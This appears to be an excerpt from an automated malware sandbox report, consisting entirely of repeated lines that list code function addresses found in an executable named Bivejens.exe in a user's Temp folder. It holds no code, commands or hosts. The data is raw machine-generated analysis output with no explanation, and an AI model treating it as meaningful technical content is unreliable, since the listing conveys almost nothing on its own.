        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219111905_2_21911190
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191119F5_2_2191119F
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219111A05_2_219111A0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219181A45_2_219181A4
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191E9D85_2_2191E9D8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191C9D85_2_2191C9D8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191E9C85_2_2191E9C8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219115F85_2_219115F8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191C9E85_2_2191C9E8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219115E85_2_219115E8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191E5385_2_2191E538
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191C5585_2_2191C558
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191E5485_2_2191E548
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21910D485_2_21910D48
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191C5485_2_2191C548
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219104985_2_21910498
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219164885_2_21916488
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191C0B75_2_2191C0B7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191E0B85_2_2191E0B8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219138B85_2_219138B8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191E0A75_2_2191E0A7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191C0C85_2_2191C0C8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219108E05_2_219108E0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219100175_2_21910017
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191DC195_2_2191DC19
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191FC185_2_2191FC18
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219130085_2_21913008
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219160305_2_21916030
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191BC385_2_2191BC38
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219160275_2_21916027
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191DC285_2_2191DC28
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191BC2B5_2_2191BC2B
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219134505_2_21913450
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191345F5_2_2191345F
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219100405_2_21910040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219134605_2_21913460
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191B7985_2_2191B798
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191D7985_2_2191D798
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219157805_2_21915780
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191D7875_2_2191D787
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191F7885_2_2191F788
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21912BB05_2_21912BB0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21918FA15_2_21918FA1
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21912BA35_2_21912BA3
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191B7A85_2_2191B7A8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21912BAF5_2_21912BAF
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21915BD85_2_21915BD8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21912FF95_2_21912FF9
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191B3185_2_2191B318
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219123005_2_21912300
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191B3075_2_2191B307
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191D3085_2_2191D308
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219177205_2_21917720
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219177225_2_21917722
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219153285_2_21915328
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219127585_2_21912758
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219127495_2_21912749
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219157705_2_21915770
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21917B775_2_21917B77
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191F7785_2_2191F778
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21917B695_2_21917B69
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21911E985_2_21911E98
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219172B85_2_219172B8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21911EA85_2_21911EA8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21914ED05_2_21914ED0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21914EC05_2_21914EC0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219172C85_2_219172C8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219122F05_2_219122F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191D2F75_2_2191D2F7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191F2F85_2_2191F2F8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191F2E75_2_2191F2E7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219146105_2_21914610
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21916A185_2_21916A18
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21916A085_2_21916A08
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219146205_2_21914620
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21911A505_2_21911A50
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191EE575_2_2191EE57
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21911A415_2_21911A41
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21916E705_2_21916E70
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21916E725_2_21916E72
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191CE785_2_2191CE78
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21914A785_2_21914A78
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191CE675_2_2191CE67
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21914A685_2_21914A68
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2191EE685_2_2191EE68
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219891805_2_21989180
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21985FD85_2_21985FD8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219866785_2_21986678
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21984D985_2_21984D98
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219879985_2_21987998
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21982D9C5_2_21982D9C
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198E7905_2_2198E790
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21981B915_2_21981B91
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219824885_2_21982488
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198BC885_2_2198BC88
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219879885_2_21987988
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21984D895_2_21984D89
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198A48F5_2_2198A48F
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219812805_2_21981280
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219856B85_2_219856B8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21988CB85_2_21988CB8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198E2B85_2_2198E2B8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219874BF5_2_219874BF
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198FAB05_2_2198FAB0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219836B75_2_219836B7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21982DA85_2_21982DA8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198CFA85_2_2198CFA8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219856A85_2_219856A8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21988CA95_2_21988CA9
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198B7AF5_2_2198B7AF
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21981BA05_2_21981BA0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198A4A05_2_2198A4A0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198FAA05_2_2198FAA0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198CFA65_2_2198CFA6
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21989FD85_2_21989FD8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21983FD85_2_21983FD8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219804D05_2_219804D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219874D05_2_219874D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198CAD15_2_2198CAD1
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198F5D75_2_2198F5D7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219836C85_2_219836C8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198E2C85_2_2198E2C8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21989FCC5_2_21989FCC
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198B7C05_2_2198B7C0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219804C05_2_219804C0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21985FC75_2_21985FC7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21981FF85_2_21981FF8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198B2F85_2_2198B2F8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21986FFB5_2_21986FFB
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219816FF5_2_219816FF
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21989AFF5_2_21989AFF
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21980DF05_2_21980DF0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219887F05_2_219887F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198DDF05_2_2198DDF0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219848F75_2_219848F7
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21983FE85_2_21983FE8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198F5E85_2_2198F5E8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21981FE85_2_21981FE8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198B2E85_2_2198B2E8
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198CAE05_2_2198CAE0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21980DE05_2_21980DE0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219887E05_2_219887E0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219829185_2_21982918
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198C6185_2_2198C618
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219883195_2_21988319
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198521C5_2_2198521C
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198AE1F5_2_2198AE1F
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219817105_2_21981710
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21989B105_2_21989B10
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198F1115_2_2198F111
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219800125_2_21980012
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219849085_2_21984908
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219870085_2_21987008
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198C6085_2_2198C608
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198DE005_2_2198DE00
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219829075_2_21982907
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219832385_2_21983238
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198D9385_2_2198D938
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21985B395_2_21985B39
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198AE305_2_2198AE30
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21986B305_2_21986B30
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219896375_2_21989637
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219852285_2_21985228
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219883285_2_21988328
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198322B5_2_2198322B
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198F1205_2_2198F120
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198D9275_2_2198D927
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21983B585_2_21983B58
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198EC585_2_2198EC58
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198A9585_2_2198A958
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198C1505_2_2198C150
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219809505_2_21980950
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21983B505_2_21983B50
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21987E505_2_21987E50
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21985B485_2_21985B48
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219896485_2_21989648
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198EC4A5_2_2198EC4A
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219800405_2_21980040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21986B405_2_21986B40
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198C1445_2_2198C144
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219844785_2_21984478
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219824785_2_21982478
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198BC785_2_2198BC78
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198E77F5_2_2198E77F
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198D4705_2_2198D470
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219812705_2_21981270
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219891715_2_21989171
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198A9685_2_2198A968
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219844685_2_21984468
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219866685_2_21986668
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219809605_2_21980960
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_21987E605_2_21987E60
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_2198D4605_2_2198D460
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219AD7105_2_219AD710
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A70C05_2_219A70C0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219AEE485_2_219AEE48
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A51805_2_219A5180
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A1F805_2_219A1F80
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A6DA05_2_219A6DA0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A3BA05_2_219A3BA0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A09A05_2_219A09A0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A57C05_2_219A57C0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A25C05_2_219A25C0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A41E05_2_219A41E0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A0FE05_2_219A0FE0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A45005_2_219A4500
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A13005_2_219A1300
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A61205_2_219A6120
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A2F205_2_219A2F20
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A4B405_2_219A4B40
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A19405_2_219A1940
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A67605_2_219A6760
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A35605_2_219A3560
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A03605_2_219A0360
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A38805_2_219A3880
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A06805_2_219A0680
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A6A805_2_219A6A80
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A54A05_2_219A54A0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A22A05_2_219A22A0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A3EC05_2_219A3EC0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A0CC05_2_219A0CC0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A5AE05_2_219A5AE0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A28E05_2_219A28E0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A5E005_2_219A5E00
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A2C005_2_219A2C00
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A48205_2_219A4820
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A16205_2_219A1620
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A64405_2_219A6440
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A32405_2_219A3240
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A00405_2_219A0040
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A4E605_2_219A4E60
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219A1C605_2_219A1C60
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BFB305_2_219BFB30
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B1CF05_2_219B1CF0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B84705_2_219B8470
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BB9905_2_219BB990
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B87905_2_219B8790
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BEB905_2_219BEB90
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B09BF5_2_219B09BF
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BD5B05_2_219BD5B0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BA3B05_2_219BA3B0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BF1D05_2_219BF1D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B09D05_2_219B09D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B8DD05_2_219B8DD0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BBFD05_2_219BBFD0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BDBF05_2_219BDBF0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BA9F05_2_219BA9F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BAD105_2_219BAD10
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BDF105_2_219BDF10
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B05085_2_219B0508
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BC9305_2_219BC930
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B97305_2_219B9730
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B13515_2_219B1351
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BE5505_2_219BE550
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BB3505_2_219BB350
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B9D705_2_219B9D70
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BCF705_2_219BCF70
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B13605_2_219B1360
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B0E985_2_219B0E98
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BA0905_2_219BA090
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BD2905_2_219BD290
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B0E8A5_2_219B0E8A
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BBCB05_2_219BBCB0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B8AB05_2_219B8AB0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BEEB05_2_219BEEB0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BD8D05_2_219BD8D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BA6D05_2_219BA6D0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B04FA5_2_219B04FA
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BF4F05_2_219BF4F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B90F05_2_219B90F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BC2F05_2_219BC2F0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B1CE05_2_219B1CE0
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B00125_2_219B0012
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BC6105_2_219BC610
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B94105_2_219B9410
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BF8105_2_219BF810
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B18175_2_219B1817
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BB0305_2_219BB030
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BE2305_2_219BE230
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B18285_2_219B1828
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219B9A505_2_219B9A50
        Source: C:\Users\user\AppData\Local\Temp\Bivejens.exeCode function: 5_2_219BCC505_2_219BCC50
